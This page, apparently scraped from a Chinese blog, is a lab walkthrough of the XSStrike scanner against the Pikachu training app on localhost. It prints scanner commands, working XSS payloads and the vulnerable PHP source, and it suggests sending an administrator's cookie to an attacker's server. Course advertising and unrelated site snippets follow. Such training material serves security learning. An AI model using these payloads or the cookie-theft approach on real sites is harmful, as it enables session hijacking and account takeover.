毕业查询结果网站怎么做自己想开个网站怎么弄

张小明 2026/1/9 18:29:52
毕业查询结果网站怎么做,自己想开个网站怎么弄,微网站模板标签,关于单位网站建设的请示本文使用靶机pikachu#xff0c;来练习一下工具XSStrike 常用命令 -u url–skip 跳过确认提示–skip-dom 跳过dom型扫描–data post型时的数据 反射型XSS(get) 输入kobe 正常 可以看到#xff0c;是get型#xff0c;页面返回正常 攻击 python xsstrike.py -u ht…本文使用靶机pikachu来练习一下工具XSStrike常用命令-u url–skip 跳过确认提示–skip-dom 跳过dom型扫描–data post型时的数据反射型XSS(get)输入kobe正常可以看到是get型页面返回正常攻击python xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?messagekobesubmitsubmit --skip --skip-dom试一下第一个payload利用的是html的details标签detAiLs%0DoNtoGgle%0A%0Aconfirm()// http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.php?message%3CdetAiLs%0doNtoGgle%0a%0aconfirm()//submitsubmit代码分析$html; if(isset($_GET[submit])){ if(empty($_GET[message])){ $html.p classnotice输入kobe试试-_-/p; }else{ if($_GET[message]kobe){ $html.p classnotice愿你和{$_GET[message]}一样永远年轻永远热血沸腾/pimg src{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png /; }else{ $html.p classnoticewho is {$_GET[message]},i dont care!/p; } } } ?php echo $html;?主要步骤isset检测变量submit是否已设置并且非 NULL即判断用户是否点击了submit按钮。得到message参数判断是否非空。若为空输出提示。若非空且为kobe输出上面截图的图片及内容。否则拼接到html变量并输出html反射型XSS(post)登录后输入1打开Hackbar和F12的控制台分别获取POST数据和Cookie。获取POST数据和Cookie攻击注意Cookie:之后有一个空格。python xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xsspost/xss_reflected_post.php --data message1submitsubmit --headers Cookie: ant[uname]admin; ant[pw]10470c3b4b1fed12c3baac014be15fac67c6e815; csrftoken7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSIDslttj3hh1eig65tvj7ldppb984使用第2个吧d3v%09onmousEOVer%0d%0dconfirm()%0dxv3dm0sburpsuite拦截修改post数据代码分析if(!$is_login_id){ header(location:post_login.php); } $state 你已经登陆成功,a hrefxss_reflected_post.php?logout1退出登陆/a; $html; if(isset($_POST[submit])){ if(empty($_POST[message])){ $html.p classnotice输入kobe试试-_-/p; }else{ //下面直接将前端输入的参数原封不动的输出了,出现xss if($_POST[message]kobe){ $html.p classnotice愿你和{$_POST[message]}一样永远年轻永远热血沸腾/pimg src{$PIKA_ROOT_DIR}assets/images/nbaplayer/kobe.png /; }else{ $html.p classnoticewho is {$_POST[message]},i dont care!/p; } } } if(isset($_GET[logout]) $_GET[logout] 1){ setcookie(ant[uname],); setcookie(ant[pw],); header(location:post_login.php); }主要步骤相同的不再赘述。和之前相比添加了登录用来设置Cookie不过仍然是进行拼接没有任何过滤。存储型XSS输入1点击提交返回正常。攻击注意由于保存到数据库及时按CtrlCpython xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xss_stored.php --data message1submitsubmit --headers Cookie: csrftoken7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSIDslttj3hh1eig65tvj7ldppb984 --skip-dom --skipXSStrike结果pikachu页面结果数据库中message表部分内容代码分析$html; if(array_key_exists(message,$_POST) $_POST[message]!null){ $messageescape($link, $_POST[message]); $queryinsert into message(content,time) values($message,now()); $resultexecute($link, $query); if(mysqli_affected_rows($link)!1){ $html.p数据库出现异常提交失败/p; } } if(array_key_exists(id, $_GET) is_numeric($_GET[id])){ //彩蛋:虽然这是个存储型xss的页面,但这里有个delete的sql注入 $querydelete from message where id{$_GET[id]}; $resultexecute($link, $query); if(mysqli_affected_rows($link)1){ echo script typetext/javascriptdocument.location.hrefxss_stored.php/script; }else{ $html.p idop_notice删除失败,请重试并检查数据库是否还好!/p; } } ?php echo $html; $queryselect * from message; $resultexecute($link, $query); while($datamysqli_fetch_assoc($result)){ echo p classcon{$data[content]}/pa hrefxss_stored.php?id{$data[id]}删除/a; } echo $html; ?主要步骤把message和时间存储到数据库直接从数据库中拿出来展示。输入未过滤输出未转码同时有个彩蛋删除时存在sql注入漏洞需要绕过is_numeric的过滤。DOM型XSS出现what do you see链接点击what do you see链接后跳转到1说明a链接中包含输入且url上也存在输入。攻击先试试和之前的文件上传漏洞合作一把。../unsafeupload/uploads/tupian.php点击what do you see?即可跳转。接下来就看xssF12查看链接what do you see?XSStrikepython xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xss_dom.php --data message1submitsubmit --headers Cookie: csrftoken7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSIDtoqllihbqq4jmiudeq49dfttt1 --skip失败手工闭合一下由于点击可能跳转使用的onmouseover事件。’ onmouseover “alert(‘lady_killer9’)”成功代码分析div idxssd_main script function domxss(){ var str document.getElementById(text).value; document.getElementById(dom).innerHTML a hrefstrwhat do you see?/a; } //试试img src# onmouseoveralert(xss) //试试 onclickalert(xss),闭合掉就行 /script !--a href onclick(xss)-- input idtext nametext typetext value / input idbutton typebutton valueclick me! onclickdomxss() / div iddom/div /div主要步骤使用innerHTML在id为dom的 div块中添加a链接输入的转为字符串放到a链接的href属性上。DOM型XSS-X输入伤心的往事上道题使用XSStrike没做出来出现了一个链接是get型传参。点击a链接又出现了一个可以看到我们的输入和上道题就一样了我估计XSStrike还是做不出来我就直接手工了。手工注入button οnclick“alert(/xss/)”成功哈哈哈那个按钮太小了差点没看见。你可以使用标签配合onerror等事件。代码分析$html; if(isset($_GET[text])){ $html. a href# onclickdomxss()有些费尽心机想要忘记的事情,后来真的就忘掉了/a; } div idxssd_main script function domxss(){ var str window.location.search; var txss decodeURIComponent(str.split(text)[1]); var xss txss.replace(/\/g, ); // alert(xss); document.getElementById(dom).innerHTML a hrefxss就让往事都随风,都随风吧/a; } //试试img src# onmouseoveralert(xss) //试试 onclickalert(xss),闭合掉就行 /script !--a href onclick(xss)-- form methodget input idtext nametext typetext value / input idsubmit typesubmit value请说出你的伤心往事/ /form div iddom/div /div主要步骤提交表单后得到text添加一个a链接href属性为#点击运行domxss函数。domxss函数将text通过正则进行一个简单过滤然后和上一个一样。漏洞原因尝试过滤但是过滤太简单。通过点击之后再显示输出可以解决大部分自动化注入脚本可以自己写脚本添加锚点即可。XSS之盲打输入帅呆了lady_killer9点击提交正常攻击python xsstrike.py -u http://127.0.0.1/pikachu/vul/xss/xssblind/xss_blind.php --data content帅呆了namelady_killersubmit提交 --headers Cookie: csrftoken7Gjcd9xR7MgIk7A7e0yks1RDppbErY9WYTFXpjxyYSzOPkEsscYH4xMZAfGzKuBy; PHPSESSIDtoqllihbqq4jmiudeq49dfttt1 --skip失败点一下提示提示原来需要登录登录后管理员能够看到结果。我们可以通过xss注入使用js发送邮件或使用websocket将管理员的cookie等发送到我们的服务器在Cookie失效前使用获得管理员权限。留言和用户名输入登录管理员账号查看攻击成功代码分析if(array_key_exists(content,$_POST) $_POST[content]!null){ $contentescape($link, $_POST[content]); $nameescape($link, $_POST[name]); $time$timedate(Y-m-d g:i:s); $queryinsert into xssblind(time,content,name) values($time,$content,$name); $resultexecute($link, $query); if(mysqli_affected_rows($link)1){ $html.p谢谢参与阁下的看法我们已经收到!/p; }else { $html.pooo.提交出现异常请重新提交/p; } } ?php $queryselect * from xssblind; $resultmysqli_query($link, $query); while($datamysqli_fetch_assoc($result)){ $htmlA tr td{$data[id]}/td td{$data[time]}/td td{$data[content]}/td td{$data[name]}/td tda hrefadmin.php?id{$data[id]}删除/a/td /tr A; echo $html; } ?主要步骤提交后直接保存到数据库。显示时直接从数据库读取出来拼接后显示。漏洞原因未对输入进行过滤输出时直接拼接。个人认为这个成功的概率太低真的是盲打sql盲注时虽然没有具体的回显但是好歹还知道sql语句是否运行成功可以通过bool或时间判断。这个直接在管理员界面你不清楚注入点也不清楚是否需要闭合。XSS之过滤输入我用Python学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】
版权声明:本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!

国内自助建站平台有哪些软件如何制作

在塔猴、Coursera、edX和B站构成的多元化学习生态中,超过2500万用户正在通过系统化课程掌握AI技能。而Perplexity、Midjourney等前沿AI工具则从应用端简化了入门门槛。如今,AI技术已不再仅仅是一个前沿概念,它正逐渐转变为一项必备的职场技能…

张小明 2026/1/2 21:14:54 网站建设

深圳市住房和建设局网站住房顺德做网站公司哪家好

RTranslator作为全球首个开源实时翻译应用,其核心功能依赖于多个大语言模型。然而,许多用户在初次使用时遭遇下载卡顿、失败等问题。本文通过深度诊断、分步实施和效果验证的三段式框架,提供全方位的下载优化方案。 【免费下载链接】RTransla…

张小明 2026/1/6 22:31:59 网站建设

app开发和网站开发的区别最吉祥的公司名字大全

文章目录进程程序替换与shell实现:从fork到exec的完整闭环一、进程程序替换1.1 为什么需要程序替换1.1.1 shell如何执行命令1.2 程序替换的原理1.3 exec函数族详解1.3.1 命名规律1.3.2 六个函数的对比1.4 exec函数使用示例1.4.1 基本使用:execl1.4.2 使用…

张小明 2026/1/3 5:15:19 网站建设

找网站建设都需要注意哪些为成长持续赋能

为什么你的Open WebUI搜索结果总是不准确?5步重排序优化终极指南 【免费下载链接】open-webui Open WebUI 是一个可扩展、功能丰富且用户友好的自托管 WebUI,设计用于完全离线操作,支持各种大型语言模型(LLM)运行器&am…

张小明 2026/1/3 5:15:15 网站建设

2核4g做网站餐饮网站开发背景

小电视空降助手:终极B站广告跳过插件指南 【免费下载链接】BilibiliSponsorBlock 一款跳过B站视频中恰饭片段的浏览器插件,移植自 SponsorBlock。A browser extension to skip sponsored segments in videos on Bilibili.com, ported from the SponsorBl…

张小明 2026/1/3 4:49:57 网站建设

公司网站注意事项古塔网站建设

快速体验 打开 InsCode(快马)平台 https://www.inscode.net输入框内输入如下内容: 创建一个Microsoft Edge企业管理系统演示项目,展示以下功能:1. 多层级组织架构下的策略继承和覆盖 2. 批量设备分组和策略应用 3. 浏览器版本自动更新控制 4…

张小明 2026/1/4 2:35:26 网站建设